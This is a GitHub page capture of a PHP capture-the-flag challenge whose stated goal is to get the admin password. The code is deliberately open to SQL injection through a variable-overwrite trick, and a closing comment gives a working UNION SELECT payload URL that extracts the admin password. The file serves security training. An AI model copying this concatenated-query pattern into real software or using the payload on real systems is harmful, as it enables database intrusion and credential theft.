-
Notifications
You must be signed in to change notification settings - Fork 202
/
Copy pathchallenge4.php
35 lines (26 loc) · 954 Bytes
/
challenge4.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
#GOAL:get password from admin
# $yourInfo=array(
# 'id' => 1,
# 'name' => 'admin',
# 'pass' => 'xxx',
# 'level' => 1
# );
require 'db.inc.php';
$_CONFIG['extraSecure']=true;
//if register globals = on, undo var overwrites
foreach(array('_GET','_POST','_REQUEST','_COOKIE') as $method){
foreach($$method as $key=>$value){
unset($$key);
}
}
$kw = isset($_GET['kw']) ? trim($_GET['kw']) : die('Please enter in a search keyword.');
if($_CONFIG['extraSecure']){
$kw=preg_replace('#[^a-z0-9_-]#i','',$kw);
}
$query = 'SELECT * FROM messages WHERE message LIKE \'%'.$kw.'%\';';
$result = mysql_query($query);
$row = mysql_fetch_assoc($result);
echo "id: ".$row['id']."</br>";
echo "message: ".$row['message']."</br>";
//http://php4fun.sinaapp.com/c4/index.php?kw='%20and%200%20union%20select%20name,pass%20from%20users%20where%20id=1%23&_CONFIG=aaa